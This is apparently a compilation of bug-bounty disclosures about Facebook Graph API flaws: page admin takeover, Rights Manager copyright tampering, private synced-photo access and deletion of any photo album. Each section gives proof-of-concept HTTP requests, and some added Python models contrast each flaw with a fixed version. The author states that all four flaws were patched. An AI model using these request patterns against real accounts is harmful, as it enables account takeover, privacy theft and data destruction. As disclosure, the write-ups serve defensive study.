Hacking Facebook Pages


The Facebook business manager endpoint has a security vulnerability that allows a third-party application to hack into a Facebook account page with limited permissions, resulting in the victim losing admin access to the page for good after the attack.

By default, Facebook's application interface does not allow third-party applications to add or modify page admin roles (page roles such as manager, editor, analyst, etc.); this is a security feature. Third-party applications are permitted to perform all other operations, such as posting statuses on your behalf, publishing photos, and so on, with the exception of adding or removing admin roles. This is because an application that is permitted to add or remove admin roles could add some user as an admin to the page and permanently remove the actual owner.

For business pages, however, there is an endpoint called userpermissions that allows administrators who are already in charge of running the Facebook business to add or remove business page admin roles.



The following request would elevate the target user to the position of page administrator.

Request:-

POST /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<application_access_token>

Response:-

true

After a few minutes of testing, I discovered that removing the business parameter from the request did not result in any errors and that we were able to add anyone as a new page admin and delete the actual page admin on the non-business page where the application had the manage_pages permission without encountering any issues.

That's all there is to it! No matter what application it is, if it has been granted the manage_pages permission by the administrator, it has the ability to hack into all of your Facebook account pages in a matter of seconds.
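The flaw described above can be modelled as an authorization check that runs only when an optional request field is present. This is an added example, not code from the original post or from Facebook; the handler names, the `Page`/`Token` classes and the sample data are assumptions made for illustration.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed sample data: which users administer which business.
BUSINESS_ADMINS = {"biz_1": {"alice"}}

@dataclass
class Page:
    roles: dict                        # user id -> role
    business_id: Optional[str] = None  # None for a non-business page

@dataclass
class Token:
    user_id: str
    scopes: frozenset                  # permissions the user granted the app

def add_role_before(page, token, params):
    """Model of the flaw: the business check runs only if the field is sent."""
    if "manage_pages" not in token.scopes:
        return False
    business = params.get("business")
    if business is not None:
        if business != page.business_id:
            return False
        if token.user_id not in BUSINESS_ADMINS.get(business, set()):
            return False
    # Reached with no business check at all when the field is omitted.
    page.roles[params["user"]] = params["role"]
    return True

def add_role_after(page, token, params):
    """Hardened: the business context is mandatory and derived from the page."""
    if "manage_pages" not in token.scopes:
        return False
    if page.business_id is None:
        return False                   # endpoint is for business pages only
    if params.get("business") != page.business_id:
        return False                   # missing or mismatched field is a denial
    if token.user_id not in BUSINESS_ADMINS.get(page.business_id, set()):
        return False
    page.roles[params["user"]] = params["role"]
    return True
```

The hardened handler treats a missing `business` field as a denial instead of skipping the check, which is the property to test for on any endpoint whose authorization depends on a caller-supplied parameter.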

The final proof of concept for Page Takeover is as follows:

Request:-

POST /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

role=MANAGER&user=<target_user_id>&access_token=<application_access_token>

Removing the victim:

Request:-

DELETE /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

user=<target_user_id>&access_token=<application_access_token>

Response:-

true

That's all there is to it! The targeted page has been hacked!

This vulnerability was reported to the Facebook security team, and it has since been completely resolved. As a result of my participation in their bug bounty program, they awarded me $2500 USD. Despite the fact that they have implemented a fix for this vulnerability, you should be cautious about the permissions you grant to any applications.

This is what the Permissions dialog box would look like.

The Manage Pages Permissions dialog box is displayed.

If the manage_pages permission is requested, please keep in mind that the app will be able to manage your pages (post statuses, publish photos, etc.).

Hacking Rights Manager - Freebooting on Facebook

Freebooting is a form of piracy that is most commonly associated with downloading someone else's copyrighted material and uploading it to any other internet platform, most commonly videos from YouTube to Facebook. Hacking Facebook brand page copyright data is relatively simple thanks to a security vulnerability in Facebook's newly introduced platform called [Copy] Rights Manager (which was created to prevent freebooting).

Freebooting in Facebook's native video player is something that the company is actively attempting to prevent. Recently, in April, they introduced a tool called Rights Manager, which allows well-known brands to detect and claim their copyrighted videos that have been uploaded to the social media platform. This feature makes it simple to identify people who frequently upload videos that are infringing on others' intellectual property rights.

It is possible for pages/profiles that are constantly uploading copyrighted materials to be banned at some point.

When using the rights manager tool, brands can upload their video items (source videos in order to detect pirated videos) and the owners will receive notifications whenever one of their copyrighted videos is shared on social media. Occasionally, copyright owners can request that pirated videos be removed from YouTube, or they can request that a few specific brands be exempted from the policy.

So, what exactly is the hack?

The rights manager's application interface enables end-users to manipulate request data and gain control over other brand pages' copyright source data through the use of a web browser.

As a layperson would put it, because the rights manager's authentication mechanism is not validating requests properly, any Facebook user without consent permission can read, edit, and delete source video or manipulate the detected pirated video without being denied access.

Specifications

The Rights Manager tool has been preapproved for a few official pages, and anyone can submit a request to have it approved for their page.

Preview of the Facebook CopyRights Manager Tool

Once your application has been approved, you can begin uploading your videos in order to detect pirated copies in the Facebook native video player area.

Rights Manager makes use of the Graph API, and its official documentation lists a number of endpoints that can be accessed by third-party apps. Default settings for the Rights Manager GUI include the use of a pre-approved app known as "2734654184080: Content Tab of a Page on www." The access token can be found in the source code of the application.

https://www.facebook.com/<page_username>/publishing_tools/?section=NEW_MATCHES

Due to the fact that it is a Facebook-owned application, its access token allows us to read or manipulate data for any Brand page, as there are insufficient permission checks.

Proof of Concept:

Modifying the victim's copyright:

https://graph.facebook.com/v2.6/<copyright_id copied from victim query>?method=post&monitoring_type=VIDEO_AND_AUDIO&access_token=<attacker_access_token>&whitelisted_ids=<attacker ids to bypass copyright check>&rule_id=<any rule id if you wish, optional field>&ownership_countries=<can update countries as well but optional>

All of the above-mentioned fields that have been included in the parameters can be changed.

Examining the victim's video copyrights:

https://graph.facebook.com/v2.6/<victim_page_id>/video_copyrights?access_token=<attacker_access_token>

Deleting the victim's copyright:

https://graph.facebook.com/v2.6/<victim_page_copyright_id>?method=delete&access_token=<attacker_access_token>

Creating a copyright rule on behalf of the victim's page:

https://graph.facebook.com/v2.6/<victim_page_id>/video_copyright_rules?access_token=<attacker_access_token>&name=testrule&condition_groups=[{action:"ALLOW",conditions:[{type:"MONITORING_TYPE",operator:"IS",value:"VIDEO_ONLY"}]}]

Reading the victim's copyright rules:

https://graph.facebook.com/v2.6/<victim_page_id>/video_copyright_rules?access_token=<attacker_access_token>

Removing an infringing copyright rule from a victim's page:

https://graph.facebook.com/v2.6/?method=delete&access_token=<attacker_access_token>

Facebook acknowledged the fix and awarded a bounty of $4000 USD.

How I Exposed Your Private Photos on Facebook - Facebook Private Photos Hack

What would you do if your private mobile photos were leaked to the public?

Taking photos with our mobile phones is something that we all do on a regular basis, and there are bound to be some private photos among them. What happens if it is hacked?

Oh my goodness! Hackers gain access to private photos.

Specifically, this post is about a security vulnerability that I discovered on Facebook that allows any malicious Facebook application to hack into your mobile photos and videos (synced).

The Facebook mobile application has a feature called "Sync photos" that allows us to create a backup of our mobile photos (up to 2 GB) and store them on our computer. This feature allows the Facebook mobile application to upload all of the photos taken by your mobile device to your Facebook account, where they will remain private until you choose to make them public again.

Some mobile phones have the ability to automatically sync photos enabled by default. We can manage it through the app's settings. The majority of us are completely unaware of this feature. In order to prevent Facebook from saving your photos, go to the app settings and turn off the feature.

I was extremely interested in learning which endpoint was in charge of these photographs. After doing some research, I discovered that the "vaultimages" endpoint of the Facebook Graph API is responsible for handling the synced photos. I began my exploration by going through the endpoint. Reading the synced photos through this endpoint caused my eyes to become irritated, and it appeared to be vulnerable.

After only a few minutes of testing, I discovered that the "vaultimages" endpoint is vulnerable to attack. It's a resounding yes!

The Facebook mobile application sends a GET request to https://graph.facebook.com/me/vaultimages with a top-level access token in order to read the synced photos from the Facebook server. If the request contains a valid access token, the Facebook server will respond with the synced photos of the corresponding user.

The vulnerable part is that the server only checks the owner of the access token, rather than checking the application that is making the request. As a result, any application that has the user_photos permission can read the photos synced from your mobile device.

A large number of Facebook applications use the user_photos permission to read users' public photos.

In a matter of seconds, a malicious app that you are currently using can access all of your private photos. I understand that the majority of us will not be able to see the list of permissions while using any application.

Permissions for the Facebook Application

Please take the time to review the permissions before granting them.


I reported this vulnerability to the Facebook Security Team, and as is customary, they responded extremely quickly to address the issue. In less than 30 minutes after receiving notification of the report, they implemented a fix. They are absolutely fantastic in this regard!

No other applications will be able to access your private photos anymore because they have simply whitelisted their official mobile applications in that endpoint.

This vulnerability has been completely patched, and vault images can no longer be accessed by any application other than those that have been whitelisted.

{"error": {"message": "(#3) App must be on whitelist", "type": "OAuthException", "code": 3}}
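The difference between checking only the token owner and also checking the calling application can be shown with a small model of the endpoint before and after the fix. This is an added example, not code from the original post or from Facebook; the token table, app ids and function names are constructed for illustration, and only the allowlist error body is taken from the page.

```python
# Constructed sample data; user ids, app ids and file names are placeholders.
SYNCED = {"user_1": ["IMG_0001.jpg", "IMG_0002.jpg"]}   # private synced photos
ALLOWLISTED_APPS = {"official_mobile_app"}               # hypothetical app id
TOKENS = {
    "tok_quiz": {"user": "user_1", "app": "quiz_app",
                 "scopes": {"user_photos"}},
    "tok_mobile": {"user": "user_1", "app": "official_mobile_app",
                   "scopes": {"user_photos"}},
}

# Error body as quoted on the page after the fix.
NOT_ALLOWLISTED = {"error": {"message": "(#3) App must be on whitelist",
                             "type": "OAuthException", "code": 3}}
# Placeholder for any other denial; not a real Graph API error.
DENIED = {"error": {"message": "denied (placeholder)"}}

def vaultimages_before(token):
    """Before the fix: only the token owner and user_photos are considered."""
    ident = TOKENS.get(token)
    if ident is None or "user_photos" not in ident["scopes"]:
        return DENIED
    return {"data": SYNCED.get(ident["user"], [])}

def vaultimages_after(token):
    """After the fix: the calling app must also be on the allowlist."""
    ident = TOKENS.get(token)
    if ident is None:
        return DENIED
    if ident["app"] not in ALLOWLISTED_APPS:
        return NOT_ALLOWLISTED
    return {"data": SYNCED.get(ident["user"], [])}
```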

The first official acknowledgment from the Facebook Security Team has been received.

Vulnerability in Facebook's Private Photos & Videos Facebook's Security Team has acknowledged receipt of your message.

Deleting Any Photo Album - How I Hacked Your Facebook Photos

What happens if your photos are accidentally deleted without your permission?

That is, without a doubt, extremely disgusting, isn't it? Yes. This post is in regards to a vulnerability that I discovered that allows a malicious user to delete any photo album on Facebook without being detected. Any photo album owned by a user, a page, or a group may be removed from the system.

The Graph API is the primary interface through which developers can read and write data about users. Graph API is currently being used by all Facebook applications. In general, in order to read or write user data, the Graph API requires an access token.

According to Facebook's developer documentation, photo albums cannot be deleted through the album node in the Graph API.

I attempted to delete one of my photo albums by using the access token for graph explorer.

Request:-

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=CAACEd…..MUD

Response:-

{"error": {"message": "(#200) Application does not have the capability to make this API call.", "type": "OAuthException", "code": 200}}

Why? This is due to the fact that this application does not have the capability to delete a photo album. However, we must take note of the error message. Essentially, it informs us that another application does indeed have the capability to make this API call.

Because it is a top-level access token with some additional permissions, I decided to test with a Facebook for mobile access token. The Graph API is used by both the Facebook mobile apps and the Facebook website. So I used an album id and a Facebook for Android access token that I had and gave it a shot.

Request:-

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook for Android Access Token>

Response:-

true

What should I do now that my album (518171421550249) has been deleted? The attacker took the victim's album id and attempted to delete it. I was extremely interested in seeing the outcome.

Request:-

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook for Android Access Token>

Response:-

true

OMG, the album was accidentally deleted! What's the big deal? I was granted access to delete all of your Facebook photos (either those that are visible to the public or those that I could see).

This bug was reported to the Facebook security team as soon as it was discovered. They were far too quick in identifying the problem, and a fix was in place in less than 2 hours after receiving notification of the problem.
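The album deletion bug, like the Rights Manager issue earlier on this page, comes down to a privileged first-party token passing an app-level check while nothing verifies that the token's user may act on the specific object. The sketch below is an added example, not code from the original post or from Facebook; the capability table, ids, function names and audit log are assumptions made for illustration, and only the (#200) error body comes from the page.

```python
# Constructed sample data; app ids and the capability name are placeholders.
APP_CAPABILITIES = {"explorer_app": set(), "mobile_app": {"delete_album"}}

# Error body as quoted on the page for an app without the capability.
NO_CAPABILITY = {"error": {"message": "(#200) Application does not have the "
                                      "capability to make this API call.",
                           "type": "OAuthException", "code": 200}}

def delete_album_before(albums, token, album_id):
    """Model of the flaw: app capability is the only gate."""
    if "delete_album" not in APP_CAPABILITIES.get(token["app"], set()):
        return NO_CAPABILITY
    albums.pop(album_id, None)      # no check that token["user"] owns the album
    return True

def delete_album_after(albums, token, album_id, audit):
    """Hardened: capability check plus object-level ownership, with an audit trail."""
    if "delete_album" not in APP_CAPABILITIES.get(token["app"], set()):
        return NO_CAPABILITY
    owner = albums.get(album_id)    # albums maps album id -> owner user id
    allowed = owner is not None and owner == token["user"]
    # Record every attempt so cross-account deletes are visible to defenders.
    audit.append((token["user"], token["app"], album_id, allowed))
    if not allowed:
        return False                # placeholder denial, not a real API error
    del albums[album_id]
    return True
```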

More information can be found at [Capture Android HTTP/HTTPS Traffic] about obtaining a Facebook access token for Android.

Final Proof of Concept:-

Request:-

DELETE /<Victim's photo album id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Your(Attacker) Facebook for Android Access Token>

If you're not sure how to do it, watch this video [How I Hacked Your Public Facebook Photos] to learn how.